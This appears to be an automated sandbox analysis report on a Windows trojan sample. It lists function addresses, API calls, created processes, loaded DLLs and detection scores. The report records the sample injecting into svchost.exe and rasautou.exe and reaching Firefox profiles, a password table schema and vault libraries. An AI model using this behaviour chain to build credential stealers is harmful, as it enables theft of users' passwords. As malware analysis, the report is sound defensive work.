Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FEEDB	2_2_034FEEDB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03452E90	2_2_03452E90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FCE93	2_2_034FCE93
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344AD00	2_2_0344AD00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DCD1F	2_2_034DCD1F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0343ADE0	2_2_0343ADE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03458DBF	2_2_03458DBF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03440C00	2_2_03440C00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03430CF2	2_2_03430CF2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E0CB5	2_2_034E0CB5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342D34C	2_2_0342D34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F132D	2_2_034F132D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0348739A	2_2_0348739A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345B2C0	2_2_0345B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E12ED	2_2_034E12ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034452A0	2_2_034452A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347516C	2_2_0347516C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0342F172	2_2_0342F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0350B16B	2_2_0350B16B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0344B1B0	2_2_0344B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EF0CC	2_2_034EF0CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034470C0	2_2_034470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F70E9	2_2_034F70E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FF0E0	2_2_034FF0E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FF7B0	2_2_034FF7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03485630	2_2_03485630
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F16CC	2_2_034F16CC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F7571	2_2_034F7571
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_035095C3	2_2_035095C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DD5B0	2_2_034DD5B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03431460	2_2_03431460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FF43F	2_2_034FF43F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFB76	2_2_034FFB76
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B5BF0	2_2_034B5BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0347DBF9	2_2_0347DBF9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345FB80	2_2_0345FB80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFA49	2_2_034FFA49
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F7A46	2_2_034F7A46
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B3A6C	2_2_034B3A6C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034EDAC6	2_2_034EDAC6
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034DDAAC	2_2_034DDAAC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03485AA0	2_2_03485AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034E1AA3	2_2_034E1AA3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03449950	2_2_03449950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345B950	2_2_0345B950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034D5910	2_2_034D5910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034AD800	2_2_034AD800
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034438E0	2_2_034438E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFF09	2_2_034FFF09
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03403FD2	2_2_03403FD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03403FD5	2_2_03403FD5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03441F92	2_2_03441F92
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFFB1	2_2_034FFFB1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03449EB0	2_2_03449EB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03443D40	2_2_03443D40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F1D5A	2_2_034F1D5A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034F7D73	2_2_034F7D73
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_0345FDC0	2_2_0345FDC0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034B9C32	2_2_034B9C32
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_034FFCF2	2_2_034FFCF2
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	Code function: 10_2_030573DF	10_2_030573DF
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	Code function: 10_2_0303EE4B	10_2_0303EE4B
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	Code function: 10_2_0303EE4F	10_2_0303EE4F
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	Code function: 10_2_0303867F	10_2_0303867F
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	Code function: 10_2_030366FF	10_2_030366FF
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	Code function: 10_2_0303845F	10_2_0303845F
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044F2446	11_2_044F2446
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044E4420	11_2_044E4420
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044EE4F6	11_2_044EE4F6
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04440535	11_2_04440535
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04500591	11_2_04500591
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0445C6E0	11_2_0445C6E0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04464750	11_2_04464750
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04440770	11_2_04440770
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0443C7C0	11_2_0443C7C0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044D2000	11_2_044D2000
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044C8158	11_2_044C8158
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04430100	11_2_04430100
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044DA118	11_2_044DA118
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044F81CC	11_2_044F81CC
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044F41A2	11_2_044F41A2
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_045001AA	11_2_045001AA
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044E0274	11_2_044E0274
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044C02C0	11_2_044C02C0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044FA352	11_2_044FA352
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0444E3F0	11_2_0444E3F0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_045003E6	11_2_045003E6
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04440C00	11_2_04440C00
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04430CF2	11_2_04430CF2
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044E0CB5	11_2_044E0CB5
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0444AD00	11_2_0444AD00
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044DCD1F	11_2_044DCD1F
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0443ADE0	11_2_0443ADE0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04458DBF	11_2_04458DBF
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04440E59	11_2_04440E59
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044FEE26	11_2_044FEE26
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044FEEDB	11_2_044FEEDB
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04452E90	11_2_04452E90
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044FCE93	11_2_044FCE93
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044B4F40	11_2_044B4F40
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04482F28	11_2_04482F28
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04460F30	11_2_04460F30
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044E2F30	11_2_044E2F30
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04432FC8	11_2_04432FC8
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0444CFE0	11_2_0444CFE0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044BEFA0	11_2_044BEFA0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0444A840	11_2_0444A840
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04442840	11_2_04442840
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0446E8F0	11_2_0446E8F0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044268B8	11_2_044268B8
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04456962	11_2_04456962
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044429A0	11_2_044429A0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0450A9A6	11_2_0450A9A6
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0443EA80	11_2_0443EA80
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044FAB40	11_2_044FAB40
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044F6BD7	11_2_044F6BD7
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04431460	11_2_04431460
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044FF43F	11_2_044FF43F
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044F7571	11_2_044F7571
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_045095C3	11_2_045095C3
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044DD5B0	11_2_044DD5B0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04485630	11_2_04485630
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044F16CC	11_2_044F16CC
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044FF7B0	11_2_044FF7B0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044EF0CC	11_2_044EF0CC
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044470C0	11_2_044470C0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044F70E9	11_2_044F70E9
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044FF0E0	11_2_044FF0E0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0447516C	11_2_0447516C
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0442F172	11_2_0442F172
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0450B16B	11_2_0450B16B
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0444B1B0	11_2_0444B1B0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0445B2C0	11_2_0445B2C0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044E12ED	11_2_044E12ED
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044452A0	11_2_044452A0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0442D34C	11_2_0442D34C
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044F132D	11_2_044F132D
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0448739A	11_2_0448739A
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044B9C32	11_2_044B9C32
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044FFCF2	11_2_044FFCF2
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04443D40	11_2_04443D40
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044F1D5A	11_2_044F1D5A
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044F7D73	11_2_044F7D73
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0445FDC0	11_2_0445FDC0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04449EB0	11_2_04449EB0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044FFF09	11_2_044FFF09
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04403FD2	11_2_04403FD2
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04403FD5	11_2_04403FD5
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04441F92	11_2_04441F92
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044FFFB1	11_2_044FFFB1
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044AD800	11_2_044AD800
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044438E0	11_2_044438E0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04449950	11_2_04449950
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0445B950	11_2_0445B950
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044D5910	11_2_044D5910
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044FFA49	11_2_044FFA49
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044F7A46	11_2_044F7A46
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044B3A6C	11_2_044B3A6C
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044EDAC6	11_2_044EDAC6
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044DDAAC	11_2_044DDAAC
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_04485AA0	11_2_04485AA0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044E1AA3	11_2_044E1AA3
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044FFB76	11_2_044FFB76
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_044B5BF0	11_2_044B5BF0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0447DBF9	11_2_0447DBF9
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0445FB80	11_2_0445FB80
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_004A22F0	11_2_004A22F0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_004BC140	11_2_004BC140
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0049D1C0	11_2_0049D1C0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0049D3E0	11_2_0049D3E0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0049B460	11_2_0049B460
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_004A59B0	11_2_004A59B0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_004A3BAC	11_2_004A3BAC
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_004A3BB0	11_2_004A3BB0
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0431E428	11_2_0431E428
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0431E543	11_2_0431E543
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0431E8DC	11_2_0431E8DC
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: 11_2_0431D9A8	11_2_0431D9A8

Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 034BF290 appears 105 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 034AEA12 appears 86 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 0342B970 appears 277 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03475130 appears 58 times
Source: C:\Windows\SysWOW64\svchost.exe	Code function: String function: 03487E54 appears 111 times
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: String function: 0065F8A0 appears 35 times
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: String function: 00656AC0 appears 42 times
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: String function: 0064EC2F appears 68 times
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: String function: 044BF290 appears 105 times
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: String function: 0442B970 appears 277 times
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: String function: 04487E54 appears 111 times
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: String function: 044AEA12 appears 86 times
Source: C:\Windows\SysWOW64\rasautou.exe	Code function: String function: 04475130 appears 58 times

Source: HN1GiQ5tF7.exe, 00000000.00000003.1269189311.0000000003DD3000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs HN1GiQ5tF7.exe
Source: HN1GiQ5tF7.exe, 00000000.00000003.1262838797.0000000003F2D000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamentdll.dllj% vs HN1GiQ5tF7.exe

Source: HN1GiQ5tF7.exe

Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@7/3@16/12

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_0067CE7A GetLastError,FormatMessageW,

0_2_0067CE7A

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0066AB84 AdjustTokenPrivileges,CloseHandle,		0_2_0066AB84
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Code function: 0_2_0066B134 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,		0_2_0066B134

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_0067E1FD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,

0_2_0067E1FD

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_00676532 CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,__wsplitpath,_wcscat,CloseHandle,

0_2_00676532

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_0068C18C CoInitializeSecurity,_memset,_memset,CoCreateInstanceEx,CoTaskMemFree,CoSetProxyBlanket,

0_2_0068C18C

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Code function: 0_2_0063406B CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,

0_2_0063406B

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

File created: C:\Users\user~1\AppData\Local\Temp\autB907.tmp

Jump to behavior

Source: HN1GiQ5tF7.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: C:\Program Files\Mozilla Firefox\firefox.exe

File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini

Jump to behavior

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: rasautou.exe, 0000000B.00000003.1622911584.00000000028A5000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3712150364.0000000002893000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000003.1622981572.0000000002893000.00000004.00000020.00020000.00000000.sdmp, rasautou.exe, 0000000B.00000002.3712150364.00000000028C6000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));

Source: HN1GiQ5tF7.exe	ReversingLabs: Detection: 79%
Source: HN1GiQ5tF7.exe	Virustotal: Detection: 68%

Source: unknown	Process created: C:\Users\user\Desktop\HN1GiQ5tF7.exe "C:\Users\user\Desktop\HN1GiQ5tF7.exe"
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\HN1GiQ5tF7.exe"
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	Process created: C:\Windows\SysWOW64\rasautou.exe "C:\Windows\SysWOW64\rasautou.exe"
Source: C:\Windows\SysWOW64\rasautou.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\HN1GiQ5tF7.exe"	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	Process created: C:\Windows\SysWOW64\rasautou.exe "C:\Windows\SysWOW64\rasautou.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"	Jump to behavior

Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\HN1GiQ5tF7.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: rasapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: rasdlg.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: rasman.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: mprapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: rtutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: ieframe.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: mlang.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: winsqlite3.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: vaultcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Windows\SysWOW64\rasautou.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Program Files (x86)\HgCJkKluILxMmbMWFBGcPlXvmsnBKwIVDFIkORixsDQkqBdcrjzTHRnRHrW\NkMjNSuuRDBHuZ.exe	Section loaded: rasadhlp.dll	Jump to behavior

Source: C:\Windows\SysWOW64\rasautou.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32

Jump to behavior
